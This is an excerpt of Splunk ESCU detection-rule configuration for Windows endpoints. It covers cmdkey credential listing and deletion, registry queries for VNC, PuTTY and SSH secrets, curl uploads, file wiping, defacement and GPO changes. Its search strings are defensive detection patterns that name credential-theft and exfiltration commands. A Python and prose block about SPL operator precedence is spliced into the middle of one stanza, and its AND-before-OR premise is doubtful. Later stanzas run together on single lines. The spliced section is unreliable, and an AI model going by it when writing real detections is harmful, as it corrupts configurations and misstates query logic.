action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Network administrators can use this tool for auditing purposes. Filter as needed.
action.escu.creation_date = 2023-11-23
action.escu.modification_date = 2023-11-23
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows Credentials from Password Stores Deletion - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["DarkGate Malware"]
action.risk = 1
action.risk.param._risk_message = a process $process_name$ was executed in $dest$ to delete stored credentials
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows Credentials from Password Stores Deletion - Rule
action.correlationsearch.annotations = {"analytic_story": ["DarkGate Malware"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1555"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies execution of the Windows cmdkey.exe tool with the /delete argument. This tool is abused by several post-exploitation tools and malware families, such as DarkGate, to delete stored user names, passwords or credentials on the targeted Windows host. Manipulating stored credentials can support an attacker's privilege escalation and persistence on the targeted host in further attacks.
action.notable.param.rule_title = Windows Credentials from Password Stores Deletion
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="cmdkey.exe" OR Processes.original_file_name="cmdkey.exe") AND Processes.process="*/delete*" by Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.process_guid Processes.parent_process_name Processes.parent_process Processes.parent_process_guid Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_credentials_from_password_stores_deletion_filter`

[ESCU - Windows Credentials from Password Stores Query - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies execution of the Windows cmdkey.exe tool with the /list argument. This tool is used by several post-exploitation tools, such as winPEAS as used by Prestige ransomware operators, to list stored user names, passwords or credentials on the targeted Windows host. This information can be used by the attacker for privilege escalation and persistence on the targeted host in further attacks.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1555"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies execution of the Windows cmdkey.exe tool with the /list argument. This tool is used by several post-exploitation tools, such as winPEAS as used by Prestige ransomware operators, to list stored user names, passwords or credentials on the targeted Windows host. This information can be used by the attacker for privilege escalation and persistence on the targeted host in further attacks.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Network administrators can use this tool for auditing purposes. Filter as needed.
action.escu.creation_date = 2022-11-30
action.escu.modification_date = 2022-11-30
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows Credentials from Password Stores Query - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Windows Post-Exploitation", "Prestige Ransomware", "DarkGate Malware"]
action.risk = 1
action.risk.param._risk_message = a process $process_name$ was executed in $dest$ to display stored username and credentials.
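The cmdkey.exe argument checks behind the Creation, Deletion and Query rules above, as an added example that is not ESCU code. It evaluates the intended predicate, in which the process_name/original_file_name OR group is parenthesised before the argument checks, alongside the reading SPL gives the same clause when the parentheses are left out (AND binds tighter than OR, so `a OR b AND c` is `a OR (b AND c)`), to show what the unparenthesised form additionally matches. The ProcEvent shape and the command lines are constructed; the renamed-binary case is why original_file_name is checked at all.

```python
"""Added example (not ESCU code): the cmdkey.exe predicates behind the Creation, Deletion
and Query rules, with the SPL AND-before-OR precedence pitfall made explicit."""
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Assumed minimal shape of an Endpoint.Processes record."""
    process_name: str
    original_file_name: str
    process: str  # full command line


def _has(cmd, *needles):
    lc = cmd.lower()
    return any(n in lc for n in needles)


def is_cmdkey(ev):
    """(process_name = cmdkey.exe OR original_file_name = cmdkey.exe): a renamed copy of the
    binary still carries cmdkey.exe in its version resource."""
    return ev.process_name.lower() == "cmdkey.exe" or ev.original_file_name.lower() == "cmdkey.exe"


def classify(ev):
    """Intended logic: the OR group is resolved first, then the per-rule argument checks."""
    if not is_cmdkey(ev):
        return None
    if _has(ev.process, "/generic") and _has(ev.process, "/user", "/password"):
        return "creation"
    if _has(ev.process, "/delete"):
        return "deletion"
    if _has(ev.process, "/list"):
        return "query"
    return None


def classify_as_written(ev, rule):
    """Literal reading of `process_name=cmdkey.exe OR original_file_name=cmdkey.exe AND
    process=*/<arg>*` without parentheses: SPL evaluates AND before OR, so the argument
    check only constrains the original_file_name branch and every process_name match fires."""
    args = {
        "creation": lambda c: _has(c, "/generic") and _has(c, "/user", "/password"),
        "deletion": lambda c: _has(c, "/delete"),
        "query": lambda c: _has(c, "/list"),
    }[rule]
    return ev.process_name.lower() == "cmdkey.exe" or (
        ev.original_file_name.lower() == "cmdkey.exe" and args(ev.process)
    )


def precedence_false_positives(events):
    """Events that carry none of the argument patterns yet satisfy an unparenthesised rule."""
    return [
        ev for ev in events
        if classify(ev) is None
        and any(classify_as_written(ev, r) for r in ("creation", "deletion", "query"))
    ]


# Constructed command lines (not real telemetry).
SAMPLE = [
    ProcEvent("cmdkey.exe", "cmdkey.exe",
              r"cmdkey.exe /generic:TERMSRV/fs01 /user:corp\svc-backup /password:Example-Only"),
    ProcEvent("cmdkey.exe", "cmdkey.exe", "cmdkey.exe /delete:TERMSRV/fs01"),
    ProcEvent("ck.exe", "cmdkey.exe", "ck.exe /list"),          # renamed binary, still caught
    ProcEvent("cmdkey.exe", "cmdkey.exe", "cmdkey.exe /?"),      # help text, no credential activity
]

if __name__ == "__main__":
    for ev in SAMPLE:
        print(f"{classify(ev)!s:9} <= {ev.process}")
    for ev in precedence_false_positives(SAMPLE):
        print("unparenthesised rules also fire on:", ev.process)
```

The help-text invocation is the tell: it has no /generic, /delete or /list, so the parenthesised predicate ignores it, while the unparenthesised reading fires all three rules on it purely because process_name is cmdkey.exe.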
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows Credentials from Password Stores Query - Rule
action.correlationsearch.annotations = {"analytic_story": ["Windows Post-Exploitation", "Prestige Ransomware", "DarkGate Malware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1555"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="cmdkey.exe" OR Processes.original_file_name="cmdkey.exe") AND Processes.process="*/list*" by Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.process_guid Processes.parent_process_name Processes.parent_process Processes.parent_process_guid Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_credentials_from_password_stores_query_filter`

[ESCU - Windows Credentials in Registry Reg Query - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies a process command line related to the discovery of possible passwords or credentials in the registry. This technique is abused by adversaries and post-exploitation tools like winPEAS to steal credentials from the registry of the targeted host. The registry can contain sensitive information such as user names and credentials that can be used for privilege escalation, persistence or even lateral movement. This anomaly detection can be a good pivot to detect a suspicious process querying registry keys related to passwords or private keys.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1552.002", "T1552"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies a process command line related to the discovery of possible passwords or credentials in the registry. This technique is abused by adversaries and post-exploitation tools like winPEAS to steal credentials from the registry of the targeted host. The registry can contain sensitive information such as user names and credentials that can be used for privilege escalation, persistence or even lateral movement. This anomaly detection can be a good pivot to detect a suspicious process querying registry keys related to passwords or private keys.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = unknown
action.escu.creation_date = 2022-11-30
action.escu.modification_date = 2022-11-30
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows Credentials in Registry Reg Query - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Windows Post-Exploitation", "Prestige Ransomware"]
action.risk = 1
action.risk.param._risk_message = reg query command line $process$ on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows Credentials in Registry Reg Query - Rule
action.correlationsearch.annotations = {"analytic_story": ["Windows Post-Exploitation", "Prestige Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1552.002", "T1552"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_reg` AND Processes.process = "* query *" AND Processes.process IN ("*\\Software\\ORL\\WinVNC3\\Password*", "*\\SOFTWARE\\RealVNC\\WinVNC4 /v password*", "*\\CurrentControlSet\\Services\\SNMP*", "*\\Software\\TightVNC\\Server*", "*\\Software\\SimonTatham\\PuTTY\\Sessions*", "*\\Software\\OpenSSH\\Agent\\Keys*", "*password*") by Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.process_guid Processes.parent_process_name Processes.parent_process Processes.parent_process_guid Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_credentials_in_registry_reg_query_filter`

[ESCU - Windows Curl Download to Suspicious Path - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies the use of Windows Curl.exe downloading a file to a suspicious location. \
-O or --output is used when a file is to be downloaded and placed in a specified location. \
During triage, review parallel processes for further behavior. In addition, identify if the download was successful. If a file was downloaded, capture and analyze it.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies the use of Windows Curl.exe downloading a file to a suspicious location. \
-O or --output is used when a file is to be downloaded and placed in a specified location. \
During triage, review parallel processes for further behavior. In addition, identify if the download was successful. If a file was downloaded, capture and analyze it.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = It is possible administrators or super users will use curl for legitimate purposes. Filter as needed.
action.escu.creation_date = 2021-10-19
action.escu.modification_date = 2021-10-19
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows Curl Download to Suspicious Path - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["IcedID", "Ingress Tool Transfer", "Forest Blizzard"]
action.risk = 1
action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ to download a file to a suspicious directory.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows Curl Download to Suspicious Path - Rule
action.correlationsearch.annotations = {"analytic_story": ["IcedID", "Ingress Tool Transfer", "Forest Blizzard"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies the use of Windows Curl.exe downloading a file to a suspicious location. \
-O or --output is used when a file is to be downloaded and placed in a specified location. \
During triage, review parallel processes for further behavior. In addition, identify if the download was successful. If a file was downloaded, capture and analyze it.
action.notable.param.rule_title = Windows Curl Download to Suspicious Path
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_curl` Processes.process IN ("*-O *","*--output*") Processes.process IN ("*\\appdata\\*","*\\programdata\\*","*\\public\\*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_curl_download_to_suspicious_path_filter`

[ESCU - Windows Curl Upload to Remote Destination - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies the use of Windows Curl.exe uploading a file to a remote destination. \
`-T` or `--upload-file` is used when a file is to be uploaded to a remote destination. \
`-d` or `--data` sends a POST request; POST is the HTTP method that was invented to send data to a receiving web application, and it is, for example, how most common HTML forms on the web work. \
HTTP multipart form posts are done with `-F`, but this does not appear to work with the Windows version of curl. This will be updated if adversary tradecraft using it is identified. \
Adversaries may use one of the three methods based on the remote destination and what they are attempting to upload (zip vs txt). During triage, review parallel processes for further behavior. In addition, identify if the upload was successful in network logs. If a file was uploaded, isolate the endpoint and review.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies the use of Windows Curl.exe uploading a file to a remote destination. \
`-T` or `--upload-file` is used when a file is to be uploaded to a remote destination. \
`-d` or `--data` sends a POST request; POST is the HTTP method that was invented to send data to a receiving web application, and it is, for example, how most common HTML forms on the web work. \
HTTP multipart form posts are done with `-F`, but this does not appear to work with the Windows version of curl. This will be updated if adversary tradecraft using it is identified. \
Adversaries may use one of the three methods based on the remote destination and what they are attempting to upload (zip vs txt). During triage, review parallel processes for further behavior. In addition, identify if the upload was successful in network logs. If a file was uploaded, isolate the endpoint and review.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = False positives may be limited to source control applications and may need to be filtered out.
action.escu.creation_date = 2021-11-10 action.escu.modification_date = 2021-11-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Curl Upload to Remote Destination - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ingress Tool Transfer"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ uploading a file to a remote destination. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Curl Upload to Remote Destination - Rule action.correlationsearch.annotations = {"analytic_story": ["Ingress Tool Transfer"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the use of Windows Curl.exe uploading a file to a remote destination. \ `-T` or `--upload-file` is used when a file is to be uploaded to a remotge destination. 
\ `-d` or `--data` POST is the HTTP method that was invented to send data to a receiving web application, and it is, for example, how most common HTML forms on the web work. \ HTTP multipart formposts are done with `-F`, but this appears to not be compatible with the Windows version of Curl. Will update if identified adversary tradecraft. \ Adversaries may use one of the three methods based on the remote destination and what they are attempting to upload (zip vs txt). During triage, review parallel processes for further behavior. In addition, identify if the upload was successful in network logs. If a file was uploaded, isolate the endpoint and review. action.notable.param.rule_title = Windows Curl Upload to Remote Destination action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_curl` Processes.process IN ("*-T *","*--upload-file *", "*-d *", "*--data *", "*-F *") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_curl_upload_to_remote_destination_filter` [ESCU - Windows Data Destruction Recursive Exec Files Deletion - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies a suspicious process that is recursively deleting files on a compromised host. 
This behavior has been observed in several types of destructive malware, such as CaddyWiper, DoubleZero, and SwiftSlicer, which delete or overwrite files with randomly generated strings to make recovery impossible. Additionally, this analytic can detect potential recursive file writes across multiple files using Sysmon Event 23 or 26. Sysmon considers a file as deleted as soon as it is overwritten. This analytic serves as a strong indicator of potential destructive malware activity on a host machine or the uninstallation of a large software application. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1485"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies a suspicious process that is recursively deleting files on a compromised host. This behavior has been observed in several types of destructive malware, such as CaddyWiper, DoubleZero, and SwiftSlicer, which delete or overwrite files with randomly generated strings to make recovery impossible. Additionally, this analytic can detect potential recursive file writes across multiple files using Sysmon Event 23 or 26. Sysmon considers a file as deleted as soon as it is overwritten. This analytic serves as a strong indicator of potential destructive malware activity on a host machine or the uninstallation of a large software application. action.escu.how_to_implement = To successfully implement this search, you need to ingest logs that include the process name, TargetFilename, and ProcessID executions from your endpoints. If you are using Sysmon, ensure you have at least version 2.0 of the Sysmon TA installed. action.escu.known_false_positives = The uninstallation of a large software application or the use of cleanmgr.exe may trigger this detection. A filter is necessary to reduce false positives. 
action.escu.creation_date = 2023-03-05 action.escu.modification_date = 2023-03-05 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Data Destruction Recursive Exec Files Deletion - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Swift Slicer", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = The process $process_name$ has removed a significant quantity of executable files, totaling [$count$], from the destination $dest$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}, {"threat_object_field": "deleted_files", "threat_object_type": "file_name"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Data Destruction Recursive Exec Files Deletion - Rule action.correlationsearch.annotations = {"analytic_story": ["Swift Slicer", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1485"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies a suspicious process that is recursively deleting files on a compromised host. This behavior has been observed in several types of destructive malware, such as CaddyWiper, DoubleZero, and SwiftSlicer, which delete or overwrite files with randomly generated strings to make recovery impossible. 
Additionally, this analytic can detect potential recursive file writes across multiple files using Sysmon Event 23 or 26. Sysmon considers a file as deleted as soon as it is overwritten. This analytic serves as a strong indicator of potential destructive malware activity on a host machine or the uninstallation of a large software application. action.notable.param.rule_title = Windows Data Destruction Recursive Exec Files Deletion action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode IN ("23","26") TargetFilename IN ("*.exe", "*.sys", "*.dll") | bin _time span=2m | stats count, values(TargetFilename) as deleted_files, min(_time) as firstTime, max(_time) as lastTime by user, dest, signature, signature_id, Image, process_name, process_guid | rename Image as process | where count >=500 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_data_destruction_recursive_exec_files_deletion_filter` [ESCU - Windows Defacement Modify Transcodedwallpaper File - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a modification to the Transcodedwallpaper file in the wallpaper theme directory to change the wallpaper of the host machine. This technique was seen in adversaries attempting to deface or change the desktop wallpaper of the targeted host. During our testing, the common process that affects or changes the wallpaper if a user changes it via desktop personalized setting is explorer.exe. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1491"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies a modification to the Transcodedwallpaper file in the wallpaper theme directory to change the wallpaper of the host machine. This technique was seen in adversaries attempting to deface or change the desktop wallpaper of the targeted host. During our testing, the common process that affects or changes the wallpaper if a user changes it via desktop personalized setting is explorer.exe. action.escu.how_to_implement = To successfully implement this search you need to be ingesting information on process that include the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Filesystem` node. In addition, confirm the latest CIM App 4.20 or higher is installed and the latest TA for the endpoint product. action.escu.known_false_positives = 3rd part software application can change the wallpaper. Filter is needed. 
action.escu.creation_date = 2022-08-25 action.escu.modification_date = 2022-08-25 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Defacement Modify Transcodedwallpaper File - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Brute Ratel C4"] action.risk = 1 action.risk.param._risk_message = modification or creation of transcodedwallpaper file by $process_name$ in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 9}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Defacement Modify Transcodedwallpaper File - Rule action.correlationsearch.annotations = {"analytic_story": ["Brute Ratel C4"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1491"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_path !="*\\Windows\\Explorer.EXE" by _time span=1h Processes.process_id Processes.process_name Processes.process Processes.dest Processes.process_guid Processes.original_file_name | `drop_dm_object_name(Processes)` |rename process_guid as proc_guid | join proc_guid, _time [ | tstats `security_content_summariesonly` count FROM 
datamodel=Endpoint.Filesystem where Filesystem.file_path = "*\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper" by _time span=1h Filesystem.dest Filesystem.file_create_time Filesystem.file_name Filesystem.file_path Filesystem.process_guid | `drop_dm_object_name(Filesystem)` |rename process_guid as proc_guid | fields file_name file_path process_name process_path process dest file_create_time _time proc_guid] | `windows_defacement_modify_transcodedwallpaper_file_filter` [ESCU - Windows Default Group Policy Object Modified - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic leverages Event ID 5136 to identify the modification of a default Group Policy Object. A fresh installation of an Active Directory network will typically contain two default group policy objects `Default Domain Controllers Policy` and `Default Domain Policy`. The default domain controllers policy is used to enforce and set policies to all the domain controllers within the domain environment. The default domain policy is linked to all users and computers by default. An adversary who has obtained privileged access to an Active Directory network may modify the default group policy objects to obtain further access, deploy persistence or execute malware across a large number of hosts. Security teams should monitor the modification of the default GPOs. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1484", "T1484.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic leverages Event ID 5136 to identify the modification of a default Group Policy Object. A fresh installation of an Active Directory network will typically contain two default group policy objects `Default Domain Controllers Policy` and `Default Domain Policy`. The default domain controllers policy is used to enforce and set policies to all the domain controllers within the domain environment. 
The default domain policy is linked to all users and computers by default. An adversary who has obtained privileged access to an Active Directory network may modify the default group policy objects to obtain further access, deploy persistence or execute malware across a large number of hosts. Security teams should monitor the modification of the default GPOs. action.escu.how_to_implement = To successfully implement this search, the Advanced Security Audit policy setting `Audit Directory Service Changes` within `DS Access` needs to be enabled. Furthermore, the appropriate system access control lists (SACL) need to be created as the used events are not logged by default. A good guide to accomplish this can be found here https://jgspiers.com/audit-group-policy-changes/. action.escu.known_false_positives = The default Group Policy Objects within an AD network may be legitimately updated for administrative operations, filter as needed. action.escu.creation_date = 2023-03-28 action.escu.modification_date = 2023-03-28 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Default Group Policy Object Modified - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = 